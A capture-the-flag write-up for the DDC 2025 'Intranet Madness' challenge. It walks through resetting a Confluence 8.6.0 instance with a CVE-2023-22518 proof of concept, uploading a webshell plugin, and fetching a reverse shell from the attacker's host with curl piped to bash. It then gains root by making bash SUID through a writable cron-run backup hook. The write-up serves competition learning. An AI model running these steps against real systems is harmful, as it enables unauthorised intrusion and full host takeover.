DDC 2025 Regionals - Intranet Madness

Challenge Description

Danish (Original)

Blækspruttespillene er i gang. De har sat en kommunikationsplatform op til deltagerne, og deltagerne yapper løs.

Login med bruger: 456 og password: password, eller opret din egen bruger for at deltage!

intranetmadness.hkn:8090

English (Chatgpt)

The squid games are underway. They have set up a communication platform for the participants, and the participants are chatting away.

Log in with username: 456 and password: password, or create your own account to participate!

intranetmadness.hkn:8090

Owning Confluence

Going to the URL we are greeted with a login page for a confluence instance, using the provided credentials we can login. We take note of the version displayed at the bottom: 8.6.0.

There are two spaces on the site: the meme-filled space of Blæksprutte spillerne, and DOCS. The latter is what will be useful for us.

In DOCS > Incident Response Plan > Backup Strategi we see how they run a backup script (/usr/local/bin/squidbackup.sh) each minute, and also a comment by the admin (001) about how it is important to patch the server so backup recovery isnt needed.

Lets look at 001, checking their calendar we see an event refering to a ’new’ exploit that can reset confluence to admin:admin credentials. Reading this I thought of a this blog post written by a former collegue. So the vulnerability is properly CVE-2023-22518, which version 8.6.0 of confluence is vulnerable to.

Searching for a PoC I found https://github.com/ForceFledgling/CVE-2023-22518, using this I reset the confluence instance:

┌──(osiriz㉿kali)-[~/CVE-2023-22518]
└─$ python exploit.py        
Enter the URL: http://intranetmadness.hkn:8090/json/setup-restore.action?synchronous=True       
Enter the path to the .zip file: xmlexport-20231109-060519-1.zip
Exploit Success! Login Using 'admin :: admin'

And now we can login using admin:admin.

Getting shell access

Now that we are the administrator of the confluence server, we can leverage this to get a user shell on server. Using the atlplug.jar file from the PoC github repo, we can install a webshell in confluence by going to General Configuration > Manage apps > Upload app and selecting the jar file. After it is done installing click on Get started and we have a web shell:

shell>whoami
confluence

shell>pwd
/var/atlassian/application-data/confluence

I then use https://www.revshells.com to generate a bash reverse shell to save in revshell.sh, serving it with python -m http.server, listening with nc -lvnp 9001, and then getting and running it on the server:

shell>curl http://10.0.240.241:8000/revshell.sh|bash

We now have a more usable shell, quickly stabilise the shell:

confluence@remote$ python3 -c 'import pty;pty.spawn("/bin/bash")'
confluence@remote$ ^Z
zsh: suspended  nc -lvnp 9001
osiriz@kali$ stty raw -echo; fg
[1]  + continued  nc -lvnp 9001
confluence@remote$ export TERM=xterm

Getting root

Finally we can get root by looking at the backup script (/usr/local/bin/squidbackup.sh):

confluence@remote$ ls -l /usr/local/bin/squidbackup.sh 
-rwxr-xr-x 1 root root 601 Apr  4 12:52 /usr/local/bin/squidbackup.sh

confluence@remote$ cat /usr/local/bin/squidbackup.sh 
#!/bin/bash

# Directory to back up
SOURCE_DIR="/var/atlassian/application-data/confluence"

# Backup destination (user-specified)
BACKUP_DIR="$1"

# Check if backup directory is provided
if [ -z "$BACKUP_DIR" ]; then
    echo "Usage: $0 <backup_directory>"
    exit 1
fi

echo "[*] Starting backup from '$SOURCE_DIR' to '$BACKUP_DIR'..."

# Perform the backup
cp -r "$SOURCE_DIR"/* "$BACKUP_DIR"

if [ -f "$BACKUP_DIR/post-backup.sh" ]; then
    echo "[!] post-backup.sh found. Executing..."
    chmod +x "$BACKUP_DIR/post-backup.sh"
    "$BACKUP_DIR/post-backup.sh"
fi

echo "[*] Backup completed."

We can see that we cannot write to this script, but it runs a second script called post-backup.sh from the directory denoted by the variable $BACKUP_DIR which is the 1st argument to the script, so checking the crontab we can see that is /home/conflunce/backup:

confluence@remote$ cat /etc/cron.d/confluence_backup 
*/1 * * * * /usr/local/bin/squidbackup.sh /home/confluence/backup

So lets check this script out:

confluence@remote$ ls -l /home/confluence/backup/post-backup.sh 
-rwxrwxrwx 1 confluence confluence 470 Apr  4 12:52 /home/confluence/backup/post-backup.sh

confluence@remote$ cat /home/confluence/backup/post-backup.sh 
#!/bin/bash

LOG_FILE="backup-log.txt"

echo "[$(date '+%Y-%m-%d %H:%M:%S')] post-backup.sh: Running in directory: $PWD" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Contents of $PWD:" >> "$LOG_FILE"
ls -la >> "$LOG_FILE"
echo "" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Number of files/folders in $PWD:" >> "$LOG_FILE"
ls -la | wc -l >> "$LOG_FILE"
echo "" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] post-backup.sh completed." >> "$LOG_FILE"

We can write to this file, so lets set the suid bit on /bin/bash so we can make a shell with root permissions:

confluence@remote$ echo "chmod +s /bin/bash" >> /home/confluence/backup/post-backup.sh

And after about a minute we should be able to get the root shell:

confluence@remote$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31  2024 /bin/bash

confluence@remote$ /bin/bash -p

root@remote# cat /flag.txt 
DDC{D0N7H4CK7H35QU1DSM4N}